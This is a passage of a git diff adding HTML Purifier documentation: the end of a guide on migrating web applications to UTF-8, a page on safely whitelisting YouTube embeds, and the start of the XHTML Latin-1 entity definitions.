gone through all the trouble of ensuring that your +server and embedded characters all line up properly and are +present. Good job: at +this point, you could quit and rest easy knowing that your pages +are not vulnerable to character encoding style XSS attacks. +However, just as having a character encoding is better than +having no character encoding at all, having UTF-8 as your +character encoding is better than having some other random +character encoding, and the next step is to convert to UTF-8. +But why?</p> + +<h3 id="whyutf8-i18n">Internationalization</h3> + +<p>Many software projects, at one point or another, suddenly realize +that they should be supporting more than one language. Even regular +usage in one language sometimes requires the occasional special character +that, without surprise, is not available in your character set. Sometimes +developers get around this by adding support for multiple encodings: when +using Chinese, use Big5, when using Japanese, use Shift-JIS, when +using Greek, etc. Other times, they use character references with great +zeal.</p> + +<p>UTF-8, however, obviates the need for any of these complicated +measures. After getting the system to use UTF-8 and adjusting for +sources that are outside the hand of the browser (more on this later), +UTF-8 just works. You can use it for any language, even many languages +at once, you don't have to worry about managing multiple encodings, +you don't have to use those user-unfriendly entities.</p> + +<h3 id="whyutf8-user">User-friendly</h3> + +<p>Websites encoded in Latin-1 (ISO-8859-1) which occasionally need +a special character outside of their scope often will use a character +entity reference to achieve the desired effect. For instance, θ can be +written <code>&theta;</code>, regardless of the character encoding's +support of Greek letters.</p> + +<p>This works nicely for limited use of special characters, but +say you wanted this sentence of Chinese text: 激光, +這兩個字是甚麼意思. +The ampersand encoded version would look like this:</p> + +<pre>&#28608;&#20809;, &#36889;&#20841;&#20491;&#23383;&#26159;&#29978;&#40636;&#24847;&#24605;</pre> + +<p>Extremely inconvenient for those of us who actually know what +character entities are, totally unintelligible to poor users who don't! +Even the slightly more user-friendly, "intelligible" character +entities like <code>&theta;</code> will leave users who are +uninterested in learning HTML scratching their heads. On the other +hand, if they see θ in an edit box, they'll know that it's a +special character, and treat it accordingly, even if they don't know +how to write that character themselves.</p> + +<blockquote class="aside"><p>Wikipedia is a great case study for +an application that originally used ISO-8859-1 but switched to UTF-8 +when it became far to cumbersome to support foreign languages. Bots +will now actually go through articles and convert character entities +to their corresponding real characters for the sake of user-friendliness +and searchability. See +<a href="http://meta.wikimedia.org/wiki/Help:Special_characters">Meta's +page on special characters</a> for more details. +</p></blockquote> + +<h3 id="whyutf8-forms">Forms</h3> + +<p>While we're on the tack of users, how do non-UTF-8 web forms deal +with characters that are outside of their character set? Rather than +discuss what UTF-8 does right, we're going to show what could go wrong +if you didn't use UTF-8 and people tried to use characters outside +of your character encoding.</p> + +<p>The troubles are large, extensive, and extremely difficult to fix (or, +at least, difficult enough that if you had the time and resources to invest +in doing the fix, you would be probably better off migrating to UTF-8). +There are two types of form submission: <code>application/x-www-form-urlencoded</code> +which is used for GET and by default for POST, and <code>multipart/form-data</code> +which may be used by POST, and is required when you want to upload +files.</p> + +<p>The following is a summarization of notes from +<a href="http://web.archive.org/web/20060427015200/ppewww.ph.gla.ac.uk/~flavell/charset/form-i18n.html"> +<code>FORM</code> submission and i18n</a>. That document contains lots +of useful information, but is written in a rambly manner, so +here I try to get right to the point. (Note: the original has +disappeared off the web, so I am linking to the Web Archive copy.)</p> + +<h4 id="whyutf8-forms-urlencoded"><code>application/x-www-form-urlencoded</code></h4> + +<p>This is the Content-Type that GET requests must use, and POST requests +use by default. It involves the ubiquitous percent encoding format that +looks something like: <code>%C3%86</code>. There is no official way of +determining the character encoding of such a request, since the percent +encoding operates on a byte level, so it is usually assumed that it +is the same as the encoding the page containing the form was submitted +in. (<a href="http://tools.ietf.org/html/rfc3986#section-2.5">RFC 3986</a> +recommends that textual identifiers be translated to UTF-8; however, browser +compliance is spotty.) You'll run into very few problems +if you only use characters in the character encoding you chose.</p> + +<p>However, once you start adding characters outside of your encoding +(and this is a lot more common than you may think: take curly +"smart" quotes from Microsoft as an example), +a whole manner of strange things start to happen. Depending on the +browser you're using, they might:</p> + +<ul> + <li>Replace the unsupported characters with useless question marks,</li> + <li>Attempt to fix the characters (example: smart quotes to regular quotes),</li> + <li>Replace the character with a character entity reference, or</li> + <li>Send it anyway as a different character encoding mixed in + with the original encoding (usually Windows-1252 rather than + iso-8859-1 or UTF-8 interspersed in 8-bit)</li> +</ul> + +<p>To properly guard against these behaviors, you'd have to sniff out +the browser agent, compile a database of different behaviors, and +take appropriate conversion action against the string (disregarding +a spate of extremely mysterious, random and devastating bugs Internet +Explorer manifests every once in a while). Or you could +use UTF-8 and rest easy knowing that none of this could possibly happen +since UTF-8 supports every character.</p> + +<h4 id="whyutf8-forms-multipart"><code>multipart/form-data</code></h4> + +<p>Multipart form submission takes away a lot of the ambiguity +that percent-encoding had: the server now can explicitly ask for +certain encodings, and the client can explicitly tell the server +during the form submission what encoding the fields are in.</p> + +<p>There are two ways you go with this functionality: leave it +unset and have the browser send in the same encoding as the page, +or set it to UTF-8 and then do another conversion server-side. +Each method has deficiencies, especially the former.</p> + +<p>If you tell the browser to send the form in the same encoding as +the page, you still have the trouble of what to do with characters +that are outside of the character encoding's range. The behavior, once +again, varies: Firefox 2.0 converts them to character entity references +while Internet Explorer 7.0 mangles them beyond intelligibility. For +serious internationalization purposes, this is not an option.</p> + +<p>The other possibility is to set Accept-Encoding to UTF-8, which +begs the question: Why aren't you using UTF-8 for everything then? +This route is more palatable, but there's a notable caveat: your data +will come in as UTF-8, so you will have to explicitly convert it into +your favored local character encoding.</p> + +<p>I object to this approach on idealogical grounds: you're +digging yourself deeper into +the hole when you could have been converting to UTF-8 +instead. And, of course, you can't use this method for GET requests.</p> + +<h3 id="whyutf8-support">Well supported</h3> + +<p>Almost every modern browser in the wild today has full UTF-8 and Unicode +support: the number of troublesome cases can be counted with the +fingers of one hand, and these browsers usually have trouble with +other character encodings too. Problems users usually encounter stem +from the lack of appropriate fonts to display the characters (once +again, this applies to all character encodings and HTML entities) or +Internet Explorer's lack of intelligent font picking (which can be +worked around).</p> + +<p>We will go into more detail about how to deal with edge cases in +the browser world in the Migration section, but rest assured that +converting to UTF-8, if done correctly, will not result in users +hounding you about broken pages.</p> + +<h3 id="whyutf8-htmlpurifier">HTML Purifier</h3> + +<p>And finally, we get to HTML Purifier. HTML Purifier is built to +deal with UTF-8: any indications otherwise are the result of an +encoder that converts text from your preferred encoding to UTF-8, and +back again. HTML Purifier never touches anything else, and leaves +it up to the module iconv to do the dirty work.</p> + +<p>This approach, however, is not perfect. iconv is blithely unaware +of HTML character entities. HTML Purifier, in order to +protect against sophisticated escaping schemes, normalizes all character +and numeric entity references before processing the text. This leads to +one important ramification:</p> + +<p><strong>Any character that is not supported by the target character +set, regardless of whether or not it is in the form of a character +entity reference or a raw character, will be silently ignored.</strong></p> + +<p>Example of this principle at work: say you have <code>&theta;</code> +in your HTML, but the output is in Latin-1 (which, understandably, +does not understand Greek), the following process will occur (assuming you've +set the encoding correctly using %Core.Encoding):</p> + +<ul> + <li>The <code>Encoder</code> will transform the text from ISO 8859-1 to UTF-8 + (note that theta is preserved here since it doesn't actually use + any non-ASCII characters): <code>&theta;</code></li> + <li>The <code>EntityParser</code> will transform all named and numeric + character entities to their corresponding raw UTF-8 equivalents: + <code>θ</code></li> + <li>HTML Purifier processes the code: <code>θ</code></li> + <li>The <code>Encoder</code> now transforms the text back from UTF-8 + to ISO 8859-1. Since Greek is not supported by ISO 8859-1, it + will be either ignored or replaced with a question mark: + <code>?</code></li> +</ul> + +<p>This behaviour is quite unsatisfactory. It is a deal-breaker for +international applications, and it can be mildly annoying for the provincial +soul who occasionally needs a special character. Since 1.4.0, HTML +Purifier has provided a slightly more palatable workaround using +%Core.EscapeNonASCIICharacters. The process now looks like:</p> + +<ul> + <li>The <code>Encoder</code> transforms encoding to UTF-8: <code>&theta;</code></li> + <li>The <code>EntityParser</code> transforms entities: <code>θ</code></li> + <li>HTML Purifier processes the code: <code>θ</code></li> + <li>The <code>Encoder</code> replaces all non-ASCII characters + with numeric entity reference: <code>&#952;</code></li> + <li>For good measure, <code>Encoder</code> transforms encoding back to + original (which is strictly unnecessary for 99% of encodings + out there): <code>&#952;</code> (remember, it's all ASCII!)</li> +</ul> + +<p>...which means that this is only good for an occasional foray into +the land of Unicode characters, and is totally unacceptable for Chinese +or Japanese texts. The even bigger kicker is that, supposing the +input encoding was actually ISO-8859-7, which <em>does</em> support +theta, the character would get converted into a character entity reference +anyway! (The Encoder does not discriminate).</p> + +<p>The current functionality is about where HTML Purifier will be for +the rest of eternity. HTML Purifier could attempt to preserve the original +form of the character references so that they could be substituted back in, only the +DOM extension kills them off irreversibly. HTML Purifier could also attempt +to be smart and only convert non-ASCII characters that weren't supported +by the target encoding, but that would require reimplementing iconv +with HTML awareness, something I will not do.</p> + +<p>So there: either it's UTF-8 or crippled international support. Your pick! (and I'm +not being sarcastic here: some people could care less about other languages).</p> + +<h2 id="migrate">Migrate to UTF-8</h2> + +<p>So, you've decided to bite the bullet, and want to migrate to UTF-8. +Note that this is not for the faint-hearted, and you should expect +the process to take longer than you think it will take.</p> + +<p>The general idea is that you convert all existing text to UTF-8, +and then you set all the headers and META tags we discussed earlier +to UTF-8. There are many ways going about doing this: you could +write a conversion script that runs through the database and re-encodes +everything as UTF-8 or you could do the conversion on the fly when someone +reads the page. The details depend on your system, but I will cover +some of the more subtle points of migration that may trip you up.</p> + +<h3 id="migrate-db">Configuring your database</h3> + +<p>Most modern databases, the most prominent open-source ones being MySQL +4.1+ and PostgreSQL, support character encodings. If you're switching +to UTF-8, logically speaking, you'd want to make sure your database +knows about the change too. There are some caveats though:</p> + +<h4 id="migrate-db-legit">Legit method</h4> + +<p>Standardization in terms of SQL syntax for specifying character +encodings is notoriously spotty. Refer to your respective database's +documentation on how to do this properly.</p> + +<p>For <a href="http://dev.mysql.com/doc/refman/5.0/en/charset-conversion.html">MySQL</a>, <code>ALTER</code> will magically perform the +character encoding conversion for you. However, you have +to make sure that the text inside the column is what is says it is: +if you had put Shift-JIS in an ISO 8859-1 column, MySQL will irreversibly mangle +the text when you try to convert it to UTF-8. You'll have to convert +it to a binary field, convert it to a Shift-JIS field (the real encoding), +and then finally to UTF-8. Many a website had pages irreversibly mangled +because they didn't realize that they'd been deluding themselves about +the character encoding all along; don't become the next victim.</p> + +<p>For <a href="http://www.postgresql.org/docs/8.2/static/multibyte.html">PostgreSQL</a>, there appears to be no direct way to change the +encoding of a database (as of 8.2). You will have to dump the data, and then reimport +it into a new table. Make sure that your client encoding is set properly: +this is how PostgreSQL knows to perform an encoding conversion.</p> + +<p>Many times, you will be also asked about the "collation" of +the new column. Collation is how a DBMS sorts text, like ordering +B, C and A into A, B and C (the problem gets surprisingly complicated +when you get to languages like Thai and Japanese). If in doubt, +going with the default setting is usually a safe bet.</p> + +<p>Once the conversion is all said and done, you still have to remember +to set the client encoding (your encoding) properly on each database +connection using <code>SET NAMES</code> (which is standard SQL and is +usually supported).</p> + +<h4 id="migrate-db-binary">Binary</h4> + +<p>Due to the aforementioned compatibility issues, a more interoperable +way of storing UTF-8 text is to stuff it in a binary datatype. +<code>CHAR</code> becomes <code>BINARY</code>, <code>VARCHAR</code> becomes +<code>VARBINARY</code> and <code>TEXT</code> becomes <code>BLOB</code>. +Doing so can save you some huge headaches:</p> + +<ul> + <li>The syntax for binary data types is very portable,</li> + <li>MySQL 4.0 has <em>no</em> support for character encodings, so + if you want to support it you <em>have</em> to use binary,</li> + <li>MySQL, as of 5.1, has no support for four byte UTF-8 characters, + which represent characters beyond the basic multilingual + plane, and</li> + <li>You will never have to worry about your DBMS being too smart + and attempting to convert your text when you don't want it to.</li> +</ul> + +<p>MediaWiki, a very prominent international application, uses binary fields +for storing their data because of point three.</p> + +<p>There are drawbacks, of course:</p> + +<ul> + <li>Database tools like PHPMyAdmin won't be able to offer you inline + text editing, since it is declared as binary,</li> + <li>It's not semantically correct: it's really text not binary + (lying to the database),</li> + <li>Unless you use the not-very-portable wizardry mentioned above, + you have to change the encoding yourself (usually, you'd do + it on the fly), and</li> + <li>You will not have collation.</li> +</ul> + +<p>Choose based on your circumstances.</p> + +<h3 id="migrate-editor">Text editor</h3> + +<p>For more flat-file oriented systems, you will often be tasked with +converting reams of existing text and HTML files into UTF-8, as well as +making sure that all new files uploaded are properly encoded. Once again, +I can only point vaguely in the right direction for converting your +existing files: make sure you backup, make sure you use +<a href="http://php.net/ref.iconv">iconv</a>(), and +make sure you know what the original character encoding of the files +is (or are, depending on the tidiness of your system).</p> + +<p>However, I can proffer more specific advice on the subject of +text editors. Many text editors have notoriously spotty Unicode support. +To find out how your editor is doing, you can check out <a +href="http://www.alanwood.net/unicode/utilities_editors.html">this list</a> +or <a href="http://en.wikipedia.org/wiki/Comparison_of_text_editors#Encoding_support">Wikipedia's list.</a> +I personally use Notepad++, which works like a charm when it comes to UTF-8. +Usually, you will have to <strong>explicitly</strong> tell the editor through some dialogue +(usually Save as or Format) what encoding you want it to use. An editor +will often offer "Unicode" as a method of saving, which is +ambiguous. Make sure you know whether or not they really mean UTF-8 +or UTF-16 (which is another flavor of Unicode).</p> + +<p>The two things to look out for are whether or not the editor +supports <strong>font mixing</strong> (multiple +fonts in one document) and whether or not it adds a <strong>BOM</strong>. +Font mixing is important because fonts rarely have support for every +language known to mankind: in order to be flexible, an editor must +be able to take a little from here and a little from there, otherwise +all your Chinese characters will come as nice boxes. We'll discuss +BOM below.</p> + +<h3 id="migrate-bom">Byte Order Mark (headers already sent!)</h3> + +<p>The BOM, or <a href="http://en.wikipedia.org/wiki/Byte_Order_Mark">Byte +Order Mark</a>, is a magical, invisible character placed at +the beginning of UTF-8 files to tell people what the encoding is and +what the endianness of the text is. It is also unnecessary.</p> + +<p>Because it's invisible, it often +catches people by surprise when it starts doing things it shouldn't +be doing. For example, this PHP file:</p> + +<pre><strong>BOM</strong><?php +header('Location: index.php'); +?></pre> + +<p>...will fail with the all too familiar <strong>Headers already sent</strong> +PHP error. And because the BOM is invisible, this culprit will go unnoticed. +My suggestion is to only use ASCII in PHP pages, but if you must, make +sure the page is saved WITHOUT the BOM.</p> + +<blockquote class="aside"> + <p>The headers the error is referring to are <strong>HTTP headers</strong>, + which are sent to the browser before any HTML to tell it various + information. The moment any regular text (and yes, a BOM counts as + ordinary text) is output, the headers must be sent, and you are + not allowed to send anymore. Thus, the error.</p> +</blockquote> + +<p>If you are reading in text files to insert into the middle of another +page, it is strongly advised (but not strictly necessary) that you replace out the UTF-8 byte +sequence for BOM <code>"\xEF\xBB\xBF"</code> before inserting it in, +via:</p> + +<pre>$text = str_replace("\xEF\xBB\xBF", '', $text);</pre> + +<h3 id="migrate-fonts">Fonts</h3> + +<p>Generally speaking, people who are having trouble with fonts fall +into two categories:</p> + +<ul> +<li>Those who want to +use an extremely obscure language for which there is very little +support even among native speakers of the language, and</li> +<li>Those where the primary language of the text is +well-supported but there are occasional characters +that aren't supported.</li> +</ul> + +<p>Yes, there's always a chance where an English user happens across +a Sinhalese website and doesn't have the right font. But an English user +who happens not to have the right fonts probably has no business reading Sinhalese +anyway. So we'll deal with the other two edge cases.</p> + +<h4 id="migrate-fonts-obscure">Obscure scripts</h4> + +<p>If you run a Bengali website, you may get comments from users who +would like to read your website but get heaps of question marks or +other meaningless characters. Fixing this problem requires the +installation of a font or language pack which is often highly +dependent on what the language is. <a href="http://bn.wikipedia.org/wiki/%E0%A6%89%E0%A6%87%E0%A6%95%E0%A6%BF%E0%A6%AA%E0%A7%87%E0%A6%A1%E0%A6%BF%E0%A6%AF%E0%A6%BC%E0%A6%BE:Bangla_script_display_and_input_help">Here is an example</a> +of such a help file for the Bengali language; I am sure there are +others out there too. You just have to point users to the appropriate +help file.</p> + +<h4 id="migrate-fonts-occasional">Occasional use</h4> + +<p>A prime example of when you'll see some very obscure Unicode +characters embedded in what otherwise would be very bland ASCII are +letters of the +<a href="http://en.wikipedia.org/wiki/International_Phonetic_Alphabet">International +Phonetic Alphabet (IPA)</a>, use to designate pronunciations in a very standard +manner (you probably see them all the time in your dictionary). Your +average font probably won't have support for all of the IPA characters +like ʘ (bilabial click) or ʒ (voiced postalveolar fricative). +So what's a poor browser to do? Font mix! Smart browsers like Mozilla Firefox +and Internet Explorer 7 will borrow glyphs from other fonts in order +to make sure that all the characters display properly.</p> + +<p>But what happens when the browser isn't smart and happens to be the +most widely used browser in the entire world? Microsoft IE 6 +is not smart enough to borrow from other fonts when a character isn't +present, so more often than not you'll be slapped with a nice big �. +To get things to work, MSIE 6 needs a little nudge. You could configure it +to use a different font to render the text, but you can achieve the same +effect by selectively changing the font for blocks of special characters +to known good Unicode fonts.</p> + +<p>Fortunately, the folks over at Wikipedia have already done all the +heavy lifting for you. Get the CSS from the horses mouth here: +<a href="http://en.wikipedia.org/wiki/MediaWiki:Common.css">Common.css</a>, +and search for ".IPA" There are also a smattering of +other classes you can use for other purposes, check out +<a href="http://meta.wikimedia.org/wiki/Help:Special_characters#Displaying_Special_Characters">this page</a> +for more details. For you lazy ones, this should work:</p> + +<pre>.Unicode { + font-family: Code2000, "TITUS Cyberbit Basic", "Doulos SIL", + "Chrysanthi Unicode", "Bitstream Cyberbit", + "Bitstream CyberBase", Thryomanes, Gentium, GentiumAlt, + "Lucida Grande", "Arial Unicode MS", "Microsoft Sans Serif", + "Lucida Sans Unicode"; + font-family /**/:inherit; /* resets fonts for everyone but IE6 */ +}</pre> + +<p>The standard usage goes along the lines of <code><span class="Unicode">Crazy +Unicode stuff here</span></code>. Characters in the +<a href="http://en.wikipedia.org/wiki/Windows_Glyph_List_4">Windows Glyph List</a> +usually don't need to be fixed, but for anything else you probably +want to play it safe. Unless, of course, you don't care about IE6 +users.</p> + +<h3 id="migrate-variablewidth">Dealing with variable width in functions</h3> + +<p>When people claim that PHP6 will solve all our Unicode problems, they're +misinformed. It will not fix any of the aforementioned troubles. It will, +however, fix the problem we are about to discuss: processing UTF-8 text +in PHP.</p> + +<p>PHP (as of PHP5) is blithely unaware of the existence of UTF-8 (with a few +notable exceptions). Sometimes, this will cause problems, other times, +this won't. So far, we've avoided discussing the architecture of +UTF-8, so, we must first ask, what is UTF-8? Yes, it supports Unicode, +and yes, it is variable width. Other traits:</p> + +<ul> + <li>Every character's byte sequence is unique and will never be found + inside the byte sequence of another character,</li> + <li>UTF-8 may use up to four bytes to encode a character,</li> + <li>UTF-8 text must be checked for well-formedness,</li> + <li>Pure ASCII is also valid UTF-8, and</li> + <li>Binary sorting will sort UTF-8 in the same order as Unicode.</li> +</ul> + +<p>Each of these traits affect different domains of text processing +in different ways. It is beyond the scope of this document to explain +what precisely these implications are. PHPWact provides +a very good <a href="http://www.phpwact.org/php/i18n/utf-8">reference document</a> +on what to expect from each function, although coverage is spotty in +some areas. Their more general notes on +<a href="http://www.phpwact.org/php/i18n/charsets">character sets</a> +are also worth looking at for information on UTF-8. Some rules of thumb +when dealing with Unicode text:</p> + +<ul> + <li>Do not EVER use functions that:<ul> + <li>...convert case (strtolower, strtoupper, ucfirst, ucwords)</li> + <li>...claim to be case-insensitive (str_ireplace, stristr, strcasecmp)</li> + </ul></li> + <li>Think twice before using functions that:<ul> + <li>...count characters (strlen will return bytes, not characters; + str_split and word_wrap may corrupt)</li> + <li>...convert characters to entity references (UTF-8 doesn't need entities)</li> + <li>...do very complex string processing (*printf)</li> + </ul></li> +</ul> + +<p>Note: this list applies to UTF-8 encoded text only: if you have +a string that you are 100% sure is ASCII, be my guest and use +<code>strtolower</code> (HTML Purifier uses this function.)</p> + +<p>Regardless, always think in bytes, not characters. If you use strpos() +to find the position of a character, it will be in bytes, but this +usually won't matter since substr() also operates with byte indices!</p> + +<p>You'll also need to make sure your UTF-8 is well-formed and will +probably need replacements for some of these functions. I recommend +using Harry Fuecks' <a href="http://phputf8.sourceforge.net/">PHP +UTF-8</a> library, rather than use mb_string directly. HTML Purifier +also defines a few useful UTF-8 compatible functions: check out +<code>Encoder.php</code> in the <code>/library/HTMLPurifier/</code> +directory.</p> + +<h2 id="externallinks">Further Reading</h2> + +<p>Well, that's it. Hopefully this document has served as a very +practical springboard into knowledge of how UTF-8 works. You may have +decided that you don't want to migrate yet: that's fine, just know +what will happen to your output and what bug reports you may receive.</p> + +<p>Many other developers have already discussed the subject of Unicode, +UTF-8 and internationalization, and I would like to defer to them for +a more in-depth look into character sets and encodings.</p> + +<ul> + <li><a href="http://www.joelonsoftware.com/articles/Unicode.html"> + The Absolute Minimum Every Software Developer Absolutely, + Positively Must Know About Unicode and Character Sets + (No Excuses!)</a> by Joel Spolsky, provides a <em>very</em> + good high-level look at Unicode and character sets in general.</li> + <li><a href="http://en.wikipedia.org/wiki/UTF-8">UTF-8 on Wikipedia</a>, + provides a lot of useful details into the innards of UTF-8, although + it may be a little off-putting to people who don't know much + about Unicode to begin with.</li> +</ul> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/enduser-youtube.html b/lib/htmlpurifier/docs/enduser-youtube.html new file mode 100644 index 000000000..87a36b9aa --- /dev/null +++ b/lib/htmlpurifier/docs/enduser-youtube.html @@ -0,0 +1,153 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Explains how to safely allow the embedding of flash from trusted sites in HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Embedding YouTube Videos - HTML Purifier</title> + +</head><body> + +<h1 class="subtitled">Embedding YouTube Videos</h1> +<div class="subtitle">...as well as other dangerous active content</div> + +<div id="filing">Filed under End-User</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>Clients like their YouTube videos. It gives them a warm fuzzy feeling when +they see a neat little embedded video player on their websites that can play +the latest clips from their documentary "Fido and the Bones of Spring". +All joking aside, the ability to embed YouTube videos or other active +content in their pages is something that a lot of people like.</p> + +<p>This is a <em>bad</em> idea. The moment you embed anything untrusted, +you will definitely be slammed by a manner of nasties that can be +embedded in things from your run of the mill Flash movie to +<a href="http://blog.spywareguide.com/2006/12/myspace_phish_attack_leads_use.html">Quicktime movies</a>. +Even <code>img</code> tags, which HTML Purifier allows by default, can be +dangerous. Be distrustful of anything that tells a browser to load content +from another website automatically.</p> + +<p>Luckily for us, however, whitelisting saves the day. Sure, letting users +include any old random flash file could be dangerous, but if it's +from a specific website, it probably is okay. If no amount of pleading will +convince the people upstairs that they should just settle with just linking +to their movies, you may find this technique very useful.</p> + +<h2>Looking in</h2> + +<p>Below is custom code that allows users to embed +YouTube videos. This is not favoritism: this trick can easily be adapted for +other forms of embeddable content.</p> + +<p>Usually, websites like YouTube give us boilerplate code that you can insert +into your documents. YouTube's code goes like this:</p> + +<pre> +<object width="425" height="350"> + <param name="movie" value="http://www.youtube.com/v/AyPzM5WK8ys" /> + <param name="wmode" value="transparent" /> + <embed src="http://www.youtube.com/v/AyPzM5WK8ys" + type="application/x-shockwave-flash" + wmode="transparent" width="425" height="350" /> +</object> +</pre> + +<p>There are two things to note about this code:</p> + +<ol> + <li><code><embed></code> is not recognized by W3C, so if you want + standards-compliant code, you'll have to get rid of it.</li> + <li>The code is exactly the same for all instances, except for the + identifier <tt>AyPzM5WK8ys</tt> which tells us which movie file + to retrieve.</li> +</ol> + +<p>What point 2 means is that if we have code like <code><span +class="youtube-embed">AyPzM5WK8ys</span></code> your +application can reconstruct the full object from this small snippet that +passes through HTML Purifier <em>unharmed</em>. +<a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/Filter/YouTube.php">Show me the code!</a></p> + +<p>And the corresponding usage:</p> + +<pre><?php + $config->set('Filter.YouTube', true); +?></pre> + +<p>There is a bit going in the two code snippets, so let's explain.</p> + +<ol> + <li>This is a Filter object, which intercepts the HTML that is + coming into and out of the purifier. You can add as many + filter objects as you like. <code>preFilter()</code> + processes the code before it gets purified, and <code>postFilter()</code> + processes the code afterwards. So, we'll use <code>preFilter()</code> to + replace the object tag with a <code>span</code>, and <code>postFilter()</code> + to restore it.</li> + <li>The first preg_replace call replaces any YouTube code users may have + embedded into the benign span tag. Span is used because it is inline, + and objects are inline too. We are very careful to be extremely + restrictive on what goes inside the span tag, as if an errant code + gets in there it could get messy.</li> + <li>The HTML is then purified as usual.</li> + <li>Then, another preg_replace replaces the span tag with a fully fledged + object. Note that the embed is removed, and, in its place, a data + attribute was added to the object. This makes the tag standards + compliant! It also breaks Internet Explorer, so we add in a bit of + conditional comments with the old embed code to make it work again. + It's all quite convoluted but works.</li> +</ol> + +<h2>Warning</h2> + +<p>There are a number of possible problems with the code above, depending +on how you look at it.</p> + +<h3>Cannot change width and height</h3> + +<p>The width and height of the final YouTube movie cannot be adjusted. This +is because I am lazy. If you really insist on letting users change the size +of the movie, what you need to do is package up the attributes inside the +span tag (along with the movie ID). It gets complicated though: a malicious +user can specify an outrageously large height and width and attempt to crash +the user's operating system/browser. You need to either cap it by limiting +the amount of digits allowed in the regex or using a callback to check the +number.</p> + +<h3>Trusts media's host's security</h3> + +<p>By allowing this code onto our website, we are trusting that YouTube has +tech-savvy enough people not to allow their users to inject malicious +code into the Flash files. An exploit on YouTube means an exploit on your +site. Even though YouTube is run by the reputable Google, it +<a href="http://ha.ckers.org/blog/20061213/google-xss-vuln/">doesn't</a> +mean they are +<a href="http://ha.ckers.org/blog/20061208/xss-in-googles-orkut/">invulnerable.</a> +You're putting a certain measure of the job on an external provider (just as +you have by entrusting your user input to HTML Purifier), and +it is important that you are cognizant of the risk.</p> + +<h3>Poorly written adaptations compromise security</h3> + +<p>This should go without saying, but if you're going to adapt this code +for Google Video or the like, make sure you do it <em>right</em>. It's +extremely easy to allow a character too many in <code>postFilter()</code> and +suddenly you're introducing XSS into HTML Purifier's XSS free output. HTML +Purifier may be well written, but it cannot guard against vulnerabilities +introduced after it has finished.</p> + +<h2>Help out!</h2> + +<p>If you write a filter for your favorite video destination (or anything +like that, for that matter), send it over and it might get included +with the core!</p> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/entities/xhtml-lat1.ent b/lib/htmlpurifier/docs/entities/xhtml-lat1.ent new file mode 100644 index 000000000..ffee223eb --- /dev/null +++ b/lib/htmlpurifier/docs/entities/xhtml-lat1.ent @@ -0,0 +1,196 @@ +<!-- Portions (C) International Organization for Standardization 1986 + Permission to copy in any form is granted for use with + conforming SGML systems and applications as defined in + ISO 8879, provided this notice is included in all copies. +--> +<!-- Character entity set. Typical invocation: + <!ENTITY % HTMLlat1 PUBLIC + "-//W3C//ENTITIES Latin 1 for XHTML//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml-lat1.ent"> + %HTMLlat1; +--> + +<!ENTITY nbsp " "> <!-- no-break space = non-breaking space, + U+00A0 ISOnum --> +<!ENTITY iexcl "¡"> <!-- inverted exclamation mark, U+00A1 ISOnum --> +<!ENTITY cent "¢"> <!-- cent sign, U+00A2 ISOnum --> +<!ENTITY pound "£"> <!-- pound sign, U+00A3 ISOnum --> +<!ENTITY curren "¤"> <!-- currency sign, U+00A4 ISOnum --> +<!ENTITY yen "¥"> <!-- yen sign = yuan sign, U+00A5 ISOnum --> +<!ENTITY brvbar "¦"> <!-- broken bar = broken vertical bar, + U+00A6 ISOnum --> +<!ENTITY sect "§"> <!-- section sign, U+00A7 ISOnum --> +<!ENTITY uml "¨"> <!-- diaeresis = spacing diaeresis, + U+00A8 ISOdia --> +<!ENTITY copy "©"> <!-- copyright sign, U+00A9 ISOnum --> +<!ENTITY ordf "ª"> <!-- feminine ordinal indicator, U+00AA ISOnum --> +<!ENTITY laquo "«"> <!-- left-pointing double angle quotation mark + = left pointing guillemet, U+00AB ISOnum --> +<!ENTITY not "¬"> <!-- not sign = angled dash, + U+00AC ISOnum --> +<!ENTITY shy "­"> <!-- soft hyphen = discretionary hyphen, + U+00AD ISOnum --> +<!ENTITY reg "®"> <!-- registered sign = registered trade mark sign, + U+00AE ISOnum --> +<!ENTITY macr "¯"> <!-- macron = spacing macron = overline + = APL overbar, U+00AF ISOdia --> +<!ENTITY deg "°"> <!-- degree sign, U+00B0 ISOnum --> +<!ENTITY plusmn "±"> <!-- plus-minus sign = plus-or-minus sign, + U+00B1 ISOnum --> +<!ENTITY sup2 "²"> <!-- superscript two = superscript digit two + = squared, U+00B2 ISOnum --> +<!ENTITY sup3 "³"> <!-- superscript three = superscript digit three + = cubed, U+00B3 ISOnum --> +<!ENTITY acute "´"> <!-- acute accent = spacing acute, + U+00B4 ISOdia --> +<!ENTITY micro "µ"> <!-- micro sign, U+00B5 ISOnum --> +<!ENTITY para "¶"> <!-- pilcrow sign = paragraph sign, + U+00B6 ISOnum --> +<!ENTITY middot "·"> <!-- middle dot = Georgian comma + = Greek middle dot, U+00B7 ISOnum --> +<!ENTITY cedil "¸"> <!-- cedilla = spacing cedilla, U+00B8 ISOdia --> +<!ENTITY sup1 "¹"> <!-- superscript one = superscript digit one, + U+00B9 ISOnum --> +<!ENTITY ordm "º"> <!-- masculine ordinal indicator, + U+00BA ISOnum --> +<!ENTITY raquo "»"> <!-- right-pointing double angle quotation mark + = right pointing guillemet, U+00BB ISOnum --> +<!ENTITY frac14 "¼"> <!-- vulgar fraction one quarter + = fraction one quarter, U+00BC ISOnum --> +<!ENTITY frac12 "½"> <!-- vulgar fraction one half + = fraction one half, U+00BD ISOnum --> +<!ENTITY frac34 "¾"> <!-- vulgar fraction three quarters + = fraction three quarters, U+00BE ISOnum --> +<!ENTITY iquest "¿"> <!-- inverted question mark + = turned question mark, U+00BF ISOnum --> +<!ENTITY Agrave "À"> <!-- latin capital letter A with grave + = latin capital 